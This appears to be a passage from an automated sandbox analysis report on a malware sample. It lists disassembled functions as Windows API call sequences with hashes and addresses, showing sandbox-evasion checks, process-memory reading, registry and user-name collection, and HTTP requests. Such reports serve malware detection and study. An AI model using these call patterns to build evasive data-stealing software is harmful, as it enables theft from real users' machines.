                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3466090806-1022791448
                                    • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                    • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                    • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                    • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                    APIs
                                    • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                    • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: :A$:A
                                    • API String ID: 1378416451-1974578005
                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E75A1
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7618
                                    • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 007E7674
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E76B9
                                    • HeapFree.KERNEL32(00000000), ref: 007E76C0
                                      • Part of subcall function 007E94A7: vsprintf_s.MSVCRT ref: 007E94C2
                                    • task.LIBCPMTD ref: 007E77BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                    • String ID:
                                    • API String ID: 700816787-0
                                    • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                    • Instruction ID: ae8b74682c015c64db762c57a2c7d1ba362f203ca2b3762c0c62875a0f99d736
                                    • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                    • Instruction Fuzzy Hash: 97612BB59052A8DBDB24DB50CC45FE9B7B8BF48300F0081E9E649A6141EFB45BC5CF91
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 007E6548
                                      • Part of subcall function 007E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 007E656A
                                      • Part of subcall function 007E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E659C
                                      • Part of subcall function 007E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E65EC
                                      • Part of subcall function 007E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E6626
                                      • Part of subcall function 007E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6638
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 007F557F
                                    • lstrlen.KERNEL32(00000000), ref: 007F5596
                                      • Part of subcall function 007F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F90B9
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 007F55CB
                                    • lstrlen.KERNEL32(00000000), ref: 007F55EA
                                    • strtok.MSVCRT(00000000,?), ref: 007F5605
                                    • lstrlen.KERNEL32(00000000), ref: 007F5615
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                    • String ID:
                                    • API String ID: 3532888709-0
                                    • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                    • Instruction ID: 617710821f58a8b08de274ef28231a2eeda33200ef4ba29b4c628da0db4c27c4
                                    • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                    • Instruction Fuzzy Hash: D851CCB091024CEBCB18FF60CEAAEFD7775AF14300F908118F60956691DB386B49CB52
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 007F7345
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,007F7574,004205BD), ref: 007F7383
                                    • memset.MSVCRT ref: 007F73D1
                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 007F7525
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenProcesslstrcpymemset
                                    • String ID:
                                    • API String ID: 224852652-0
                                    • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                    • Instruction ID: 6567102696191ec87767a210e1d218246309d6ac11bb516d24e026504c938a18
                                    • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                    • Instruction Fuzzy Hash: 3C5160B0D0421CEBDB18EBA0DC95BFDB774AF44305F5081A9E70967281EB786A88CF55
                                    APIs
                                    • memset.MSVCRT ref: 007F433C
                                    • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 007F435B
                                    • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 007F437F
                                    • RegCloseKey.ADVAPI32(?), ref: 007F4389
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F43AE
                                    • lstrcat.KERNEL32(?,0064A168), ref: 007F43C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                    • Instruction ID: f408e44ad82093f2e262eaf84fe105b6b6b17dba5e30ee337fd6f1a00322b041
                                    • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                    • Instruction Fuzzy Hash: 4141B3BA94010CBBDB14EBE0DC4AFFE7379AB4D700F004558B71557180EA795A988BE2
                                    APIs
                                    • memset.MSVCRT ref: 004140D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,00A19F80,00000000,00020119,?), ref: 004140F4
                                    • RegQueryValueExA.ADVAPI32(?,00A1A918,00000000,00000000,00000000,000000FF), ref: 00414118
                                    • RegCloseKey.ADVAPI32(?), ref: 00414122
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                    • lstrcatA.KERNEL32(?,00A1A8B8), ref: 0041415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                    • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                    • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                    • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                    APIs
                                    • strtok_s.MSVCRT ref: 00413588
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • strtok_s.MSVCRT ref: 004136D1
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpystrtok_s$lstrlen
                                    • String ID:
                                    • API String ID: 3184129880-0
                                    • Opcode ID: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                    • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                    • Opcode Fuzzy Hash: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                    • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                    APIs
                                    • __lock.LIBCMT ref: 0041B39A
                                      • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                      • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                      • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                    • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                      • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                    • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 2005412495-0
                                    • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                    • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                    • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                    • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                    APIs
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 007F9B08
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 007F9B21
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 007F9B39
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 007F9B51
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 007F9B6A
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 007F9B82
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 007F9B9A
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 007F9BB3
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 007F9BCB
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 007F9BE3
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 007F9BFC
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 007F9C14
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 007F9C2C
                                      • Part of subcall function 007F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 007F9C45
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007E1437: ExitProcess.KERNEL32 ref: 007E1478
                                      • Part of subcall function 007E13C7: GetSystemInfo.KERNEL32(?), ref: 007E13D1
                                      • Part of subcall function 007E13C7: ExitProcess.KERNEL32 ref: 007E13E5
                                      • Part of subcall function 007E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007E1392
                                      • Part of subcall function 007E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 007E1399
                                      • Part of subcall function 007E1377: ExitProcess.KERNEL32 ref: 007E13AA
                                      • Part of subcall function 007E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E14A5
                                      • Part of subcall function 007E1487: __aulldiv.LIBCMT ref: 007E14BF
                                      • Part of subcall function 007E1487: __aulldiv.LIBCMT ref: 007E14CD
                                      • Part of subcall function 007E1487: ExitProcess.KERNEL32 ref: 007E14FB
                                      • Part of subcall function 007F69D7: GetUserDefaultLangID.KERNEL32 ref: 007F69DB
                                      • Part of subcall function 007E13F7: ExitProcess.KERNEL32 ref: 007E142D
                                      • Part of subcall function 007F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E141E), ref: 007F7AE7
                                      • Part of subcall function 007F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 007F7AEE
                                      • Part of subcall function 007F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7B06
                                      • Part of subcall function 007F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7B77
                                      • Part of subcall function 007F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 007F7B7E
                                      • Part of subcall function 007F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 007F7B96
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D31
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D4F
                                    • CloseHandle.KERNEL32(00000000), ref: 007F6D60
                                    • Sleep.KERNEL32(00001770), ref: 007F6D6B
                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D81
                                    • ExitProcess.KERNEL32 ref: 007F6D89
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                    • Instruction ID: 89f7dc9b8fcfdd65adecefe8a32e31e8accae757792d321a57008d46b45cca6e
                                    • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                    • Instruction Fuzzy Hash: D33108B5A4020CFADB04FBF0DC5AAFD7379AF19300F504519B606A6692EF785A44CA62
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                    • ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                    • LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                    • CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                    • Instruction ID: fc0a8ea26d8b58a7c8ef120437fa662c8dfdbda943ef9d4a92d788ded3448621
                                    • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                    • Instruction Fuzzy Hash: E4314BB9A00209EFDB10DFA5C885BEE77F5FF48304F208158E905A7290D738AA41CFA1
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                    • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                    • Opcode Fuzzy Hash: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                    • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                    APIs
                                    • __getptd.LIBCMT ref: 007FCC51
                                      • Part of subcall function 007FC206: __getptd_noexit.LIBCMT ref: 007FC209
                                      • Part of subcall function 007FC206: __amsg_exit.LIBCMT ref: 007FC216
                                    • __amsg_exit.LIBCMT ref: 007FCC71
                                    • __lock.LIBCMT ref: 007FCC81
                                    • InterlockedDecrement.KERNEL32(?), ref: 007FCC9E
                                    • free.MSVCRT ref: 007FCCB1
                                    • InterlockedIncrement.KERNEL32(0042B980), ref: 007FCCC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                    • String ID:
                                    • API String ID: 634100517-0
                                    • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                    • Instruction ID: 69804d4a550488cd7eff3c20eb2f24b5df893ef1f04b78c156a066effa498c31
                                    • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                    • Instruction Fuzzy Hash: D901D231A01A2CEBC722AB699A4A77D7760FF14710F404116EE1867390C73C6841EFF9
                                    APIs
                                    • __getptd.LIBCMT ref: 0041C9EA
                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                    • __amsg_exit.LIBCMT ref: 0041CA0A
                                    • __lock.LIBCMT ref: 0041CA1A
                                    • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                    • free.MSVCRT ref: 0041CA4A
                                    • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                    • String ID:
                                    • API String ID: 634100517-0
                                    • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                    • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                    • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                    • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                    APIs
                                    • strlen.MSVCRT ref: 007F7186
                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,007F7401,00000000,00420BA8,00000000,00000000), ref: 007F71B4
                                      • Part of subcall function 007F6E37: strlen.MSVCRT ref: 007F6E48
                                      • Part of subcall function 007F6E37: strlen.MSVCRT ref: 007F6E6C
                                    • VirtualQueryEx.KERNEL32(007F7574,00000000,?,0000001C), ref: 007F71F9
                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007F7401), ref: 007F731A
                                      • Part of subcall function 007F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 007F705F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                    • String ID: @
                                    • API String ID: 2950663791-2766056989
                                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction ID: 640181949de04ab6c6d25dbe791e67f957656c86a11f7914e633b390dcc32740
                                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction Fuzzy Hash: 4551D4B5A0410DEBDB08CF99D981AFFB7B5BF88300F148519FA15A7340D738AA11DBA5
                                    APIs
                                    • strlen.MSVCRT ref: 00416F1F
